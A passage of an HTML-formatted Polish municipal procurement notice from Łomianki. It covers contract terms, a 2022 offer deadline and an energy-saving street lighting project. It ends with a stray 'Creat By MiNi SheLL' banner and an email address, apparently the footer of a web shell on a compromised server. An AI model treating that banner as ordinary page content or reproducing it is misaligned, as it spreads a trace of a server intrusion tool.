wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia zostały określone w pkt 6.10-6.11 OPiW. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy, w tym rodzaj i zakres zmian umowy zostaną zawarte w dokumentacji zamówienia, w tym w SWZ i załącznikach do niej, po etapie obowiązkowych negocjacji. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-11 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Poprzez Platformę dostępną pod adresem: https://platformazakupowa.pl/pn/lomianki</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-11 11:05</span></h3> <h3 class="mb-0">8.8.) Krótki opis minimalnych wymagań dotyczących przedmiotu zamówienia lub realizacji zamówienia, niepodlegających negocjacjom, które muszą spełnić wszystkie oferty: </h3> Celem Przedsięwzięcia jest przede wszystkim: Sfinansowanie, wykonanie Dokumentacji projektowej i Budowa oświetlenia na terenie Gminy Łomianki, wdrożenie inteligentnego systemu sterowania, a następnie świadczenie usług Utworzenia wytworzonej, zmodernizowanej i istniejącej infrastruktury w celu uzyskania zagwarantowanego w ofercie efektu energetycznego, polegającego na zmniejszeniu zużycia energii elektrycznej oraz zapewnieniu określonego standardu dostępności. <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Z uwagi na ograniczenia wprowadzenia znaków na e-Zamówieniach pełny opis znajduje się w OPiW. Każdy Wykonawca może złożyć w ramach niniejszego postępowania tylko jedną ofertę oraz tylko jedną ofertę ostateczną.<br/>2.	Ofertę składa się w formie, o której mowa w Sekcji III pkt. 3.6 pkt 3 Ogłoszenia<br/>3.	O wynikach oceny ofert Zamawiający niezwłocznie informuje Wykonawców, którzy złożyli oferty, podając uzasadnienie faktyczne i prawne.<br/>4.	Wskazany w pkt 4.2.10.) okres obowiązywania zamówienia oraz wskazany w pkt 4.2.2.) krótki opis przedmiotu zamówienia mogą ulec zmianie w toku ustaleń poczynionych w trakcie obowiązkowych negocjacji.<br/>5.	Informacje określone w art. 282 ust. 1 i 2 Ustawy Pzp zostały przedstawione w Załączniku nr 1 do Ogłoszenia pn. Opis potrzeb i wymagań.<br/>6.	Celem doprecyzowania informacji wskazanej w pkt 2.14 Ogłoszenia, Zamawiający wskazuje, że obecnie zamówienie nie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej, jednakże Zamawiający jest w trakcie starania się o pozyskanie takich środków. Informacja o ich otrzymaniu zostanie przekazana Wykonawcom najpóźniej wraz z zaproszeniem do składania ofert ostatecznych.<br/>7.	Załączniki do Ogłoszenia stanowią:<br/>a)	Opis Potrzeb i Wymagań wraz z załącznikami – Załącznik nr 1, <br/>b)	Formularz oferty – Załącznik nr 2,<br/>c)	Oświadczenie z art. 125 ust. 1 Ustawy Pzp – załącznik nr 3,<br/>d)	Wykaz robót budowalnych – Załącznik nr 4,<br/>e)	Wykaz usług – Załącznik nr 5, <br/>f)	Wykaz osób – Załącznik nr 6, <br/>g)	Oświadczenie dotyczące RODO – Załącznik nr 7,<br/>h)	Wzór zobowiązania podmiotu trzeciego o udostępnieniu zasobów – Załącznik nr 8.<br/><br/>Zamawiający przewiduje, stosownie do treści art. 285 ust. 1 PZP, możliwość zwołania zebrania Wykonawców w celu wyjaśnienia treści SWZ lub odpowiednio OPiW.<br/>Wykonawca oceni oferty ostateczne na podstawie kryteriów oceny ofert, wskazanych w pkt 10 OPiW. Przypisanie wag nie jest możliwe na obecnym etapie postępowania z obiektywnych przyczyn, zatem Zamawiający wskazuje kryteria oceny ofert w kolejności od najważniejszego do najmniej ważnego. Wagi kryteriów określone zostaną w SWZ

Creat By MiNi SheLL
Email: jattceo@gmail.com